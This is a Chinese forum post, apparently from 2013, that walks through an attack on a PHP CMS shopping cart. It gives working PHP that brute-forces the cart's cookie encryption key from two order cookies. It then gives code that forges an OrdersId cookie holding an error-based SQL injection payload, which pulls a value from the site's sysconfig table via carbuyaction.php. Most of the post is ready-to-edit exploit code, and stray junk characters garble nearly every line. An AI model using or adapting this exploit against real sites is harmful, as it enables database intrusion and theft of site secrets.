www.xxx.com/plus/search.php?keyword=. a2 o3 z/ w. g# F
在 include/shopcar.class.php中$ m- Q s$ W& L4 e& g
先看一下这个shopcar类是如何生成cookie的) H2 R6 Z4 X( w' x
239 function saveCookie($key,$value)) ?. b4 [( g$ q l
240 {5 G# C% X1 L; M; }' q4 z) _
241 if(is_array($value))+ K1 K/ t, B, N0 p
242 {4 {8 m2 B. U- L: Z0 O7 b# P
243 $value = $this->enCrypt($this->enCode($value));- j/ }* n+ [' Q! D/ C, R% `* A
244 }% w8 M8 G1 X7 R" d0 w# k/ ?
245 else6 q5 |) V9 l* Y0 _0 M
246 {
' e* K! F3 S- |247 $value = $this->enCrypt($value);$ `! M& A8 U1 G. y+ m% C: e
248 }* @7 w" {4 a* C% _) ?
249 setcookie($key,$value,time()+36000,’/');! S+ t; b$ z! b5 W$ } j
250 }
& Y' H, v* g9 m' g7 D- {, r简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
7 C- d) R. z/ w0 D186 function enCrypt($txt)( \ _" `5 t6 n% o o! @7 [3 V
187 {, v+ Y9 B/ H _& h3 k/ F2 I
188 srand((double)microtime() * 1000000);, ]$ V, [5 D( E: W$ U
189 $encrypt_key = md5(rand(0, 32000));3 r) t4 f- \( U+ t0 ?7 O7 W
190 $ctr = 0;
: i! i0 f/ e3 t& N3 @% B191 $tmp = ”;* C1 c) e4 v! L& z
192 for($i = 0; $i < strlen($txt); $i++): }% Z& o- I4 G4 j
193 {' y0 _; f `( T$ b, B
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
, G3 L2 T2 v. r195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);, _7 Y& A7 \. \$ m. J
196 }
. U4 Z: o* P. h7 U197 return base64_encode($this->setKey($tmp));
+ ~! g0 E# L! I( E3 ^/ p198 }
, Q* n. t$ S. w& c& ^213 function setKey($txt)3 |( _8 v! e1 H+ Q- Q3 ~( a
214 {, R: t- `4 S- A( x& K2 H8 U' {' g
215 global $cfg_cookie_encode;! ?- X" T$ |7 B& |+ F/ P0 u4 S3 d
216 $encrypt_key = md5(strtolower($cfg_cookie_encode));6 E! B; P; w$ N& h* S: g2 \
217 $ctr = 0;
6 P ?" B, A, Q4 @8 ^218 $tmp = ”;$ v! }7 M9 M* U
219 for($i = 0; $i < strlen($txt); $i++)6 s/ a% ?- r8 }4 [9 q* @3 c
220 {" a9 `9 |9 h# |, c
221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$ @' H# \7 b# ?% V
222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
9 i2 A+ j9 J: L) ^; Q4 v1 {" l223 }4 Z3 {: r3 q+ k' u! w% l ]# p G
224 return $tmp;! i& S. v$ P9 k2 D+ Z# j* x
225 }
4 [7 }3 w0 c- q3 ^, O" K* ienCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的2 k, b, p* u: _# u
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
9 b, [* m) V6 ?' \4 j( E4 N Y3 r具体代码如下:* d4 g4 i) D" T5 G
<?php
9 P# f `. ^' V* ~1 q9 x4 a$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
2 }9 X8 ?$ O2 }2 Z+ T$ s* ~$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
! b: e' q. K( @. Q [$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
7 y# o5 G1 F) `7 ifunction reStrCode($code,$string)
2 m' P/ p+ {+ V8 D& o{* w8 j2 d4 j D j! d3 X
$code = base64_decode($code);
7 V6 s" x: p' s& d$key = “”;
6 ~8 @5 r8 L- O- z. t) I) V8 L! Cfor($i=0 ; $i<32 ; $i++)
8 W% O( d+ ^. r# w$ D O# V{- C3 l( r$ H( i
$key .= $string[$i] ^ $code[$i];
( c% S- ]* [/ N. ^}
. b; N$ i3 h" x) z% K) rreturn $key;
( `4 X z8 T& F}8 r( V7 L) u( u
function getKeys($cookie,$plantxt)
, B9 U1 G; t$ P* U6 w" |6 Q- r' t{% N- m1 j1 a" V* D; _
$tmp = $cookie;- q5 N' R, F# C- r. Y3 J
$results = array();
4 J( {: S7 |6 z0 _for($j=0 ; $j < 32000; $j++)
2 M6 |* Q4 x% u; Z4 L- ^; w{
! W7 Q0 v" U3 F) S6 Y7 |/ [) V4 R& Z% O' G2 g( W, a
$txt = $plantxt;
! e( ?, q0 |! _* h+ d" Q$ctr = 0;
, G) F: A( w0 t$tmp = ”;, ?" v0 j7 P# l% y. P
$encrypt_key = md5($j);! T( r, s8 e# [5 S% s/ M _3 v
for($i =0; $i < strlen($txt); $i ++)# x0 u! @$ v! m/ y
{
3 R. }/ C: |5 ?; v7 O S3 H$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;: p5 z# X7 T8 f" _! C. ~( @5 `
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
0 K8 x& B% |8 H% v. x}
) m9 T2 S; o) [" n$string = $tmp;4 f O5 o+ u1 Q- ~1 V7 V+ [/ A
$code = $cookie;
/ g3 X4 u* Z: r$ o+ }: W$result = reStrCode($code,$string);9 B3 C. s: t) B- b; c4 z
if(eregi(‘^[a-z0-9]+$’,$result))
5 M: Z) z. F6 d+ ?! C{
# P- ~9 |6 p1 Z B5 c2 cecho $result.”\n”;
" {8 C- i/ o' O% |! H& ]+ P+ D- d$ k+ S$results[] = $result;4 f! y) j; q; B
}8 T H5 e, H( s' C
}# `* b& e8 z6 m
return $results;; f8 g# A. J- P4 [6 \
}
5 C4 ~9 D. \) Z& |: u8 x$results1 = getKeys($cookie1,$plantxt);5 }3 ~- W( R/ Z9 |+ u0 q
$results2 = getKeys($cookie2,$plantxt);
- D2 H% R' e3 y# P. |9 Zprint “\n——————–real key————————–\n”;( Y* e% Q2 M( L3 p' S$ c' t- W2 w
foreach($results1 as $test1)) u( U9 t7 C0 t
{
4 s$ a9 g$ v2 X& \foreach($results2 as $test2)
; V! |5 C' F7 K+ s T2 j{4 Y9 T6 F l& z9 U3 V8 `! q6 q
if($test1 == $test2)
) Y- [* S/ D+ a9 E: B{
; I W5 d2 v& C0 i( ?0 T. secho $test1.”\n”;5 `9 z) y0 Q8 Z) h0 F- Y
}
; {" _* i& v, R$ i+ |3 F}1 ]# a7 A" {* }$ o" @9 n/ l
} P$ G0 ~, `2 }8 K' p8 b
?>2 k2 L: M7 s- N' ~& z7 w" L* ~5 n
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,8 {3 |$ W" I- a; C5 w# E# D
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
( N h0 Y) G) T# w然后推算出md5(strtolower($cfg_cookie_encode))
2 E2 \1 S6 o/ e1 S: e得到这个key之后,我们就可以构造任意购物车的cookie e5 t( D, }/ E
接着看
2 C. }9 {; D( r20 class MemberShops
. \+ t! k6 \+ ]0 E21 {
1 c7 n+ |9 E, x \/ w22 var $OrdersId;
" Y4 e9 H. k/ s4 u# l. a+ b23 var $productsId;
, h% `8 q0 V, Z0 U! X24- M& `, [. P( e# Y f/ ]) }
25 function __construct()& ]7 u% [. R. U9 A
26 {4 I: e: a' w0 s6 j$ q
27 $this->OrdersId = $this->getCookie(“OrdersId”);5 f$ z: {( Y }* I
28 if(empty($this->OrdersId))
. w8 K& C U+ F# m1 v29 {
, }% k" p$ y+ A' Z% O3 }; `' ?30 $this->OrdersId = $this->MakeOrders();
4 d, _6 Z& M' [* S8 N31 }
5 P2 o5 }# m% o' D32 }3 K+ F7 z; ^2 Z
发现OrderId是从cookie里面获取的
, P/ s2 U& ?9 Z% R9 z5 Z5 E" {然后
+ x0 R; S* g+ i/plus/carbuyaction.php中的
r, _7 v H( ^0 G0 s$ _29 $cart = new MemberShops();
2 W" |6 J4 f$ x: |1 x6 K2 M) ^5 P39 $OrdersId = $cart->OrdersId; //本次记录的订单号6 C7 N3 |+ q- Y7 x! ]1 r5 j
……0 J3 J8 h$ D& Y0 `. I* f
173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
) a1 Q4 b- J' Z: t5 j! x接着我们就可以注入了
' H ~4 N1 W& L2 L" e% J通过利用下面代码生成cookie:5 H- ]7 L* u. K5 f$ a0 q$ c
<?php: {; H; e# f5 V9 j6 W+ {
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
: U% F( I3 k+ n L6 m; T$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
1 Y/ Z) E0 j- s% j; jfunction setKey($txt)
! N) B, f2 o7 V. Y- a4 P{% y( H, O- A6 i% W0 m# z4 _
global $encrypt_key;
o4 G# q, t2 I5 g$ctr = 0;; d% u3 _3 N8 R: W+ r$ J, `, ^+ b
$tmp = ”;1 E6 p, U+ O6 `6 h4 _1 q' z
for($i = 0; $i < strlen($txt); $i++)
' X+ u8 C6 [) H _{
- ]; d1 v) S# d; k2 ~0 K$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
' H' V( [7 M- e/ G% V$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];; t* {& M) b0 d/ V
}; u+ j& H! C" K- O- o8 }2 n
return $tmp;% }% k% [# p1 ^9 }
}
0 L$ A- G, o) [, r8 `function enCrypt($txt)
; B7 z: _# [- d$ N{4 V! e' A, F& ]- d
srand((double)microtime() * 1000000);5 z" e2 U/ v( z% \2 s+ Y
$encrypt_key = md5(rand(0, 32000));, M5 v0 p5 r* @; M
$ctr = 0;
7 g) }' p( O8 Z$tmp = ”;7 s% i: u7 y6 S+ Y) P' |) E y
for($i = 0; $i < strlen($txt); $i++)9 m9 o. p4 S" L. x* e
{0 |' B, j# Y8 [+ Z- `9 w* ~2 |4 ^
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;1 r; G5 |* Z8 w! F
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);5 j6 o# P% ?6 z8 E3 L0 X7 P
}9 ~' f3 ?0 G" a% X: A' ^
return base64_encode(setKey($tmp));$ v! ]$ @4 ]! x) T8 @
}1 f* D1 G: l. I: s" n7 V1 s* U
for($dest =0;$dest = enCrypt($txt);)
) n2 O# X0 x5 F& Z9 b. [! d{
/ |/ G) ?/ D, B- n cif(!strpos($dest,’+'))
( e0 j) f. s, {) X P{8 c& G: w7 i% }4 C3 G
break;
' R; M! m; }0 C8 C _ c/ L}
) e: d! f* c* {/ Q}
& @$ l. S ^7 F: c5 mecho $dest.”\n”;: o% p# S5 ]+ }; b% O
?>
6 b3 m- p2 }5 p$ d" g$ r; n* p# g# T- B
|
发表于 2013-2-13 23:58:29
收藏
支持
反对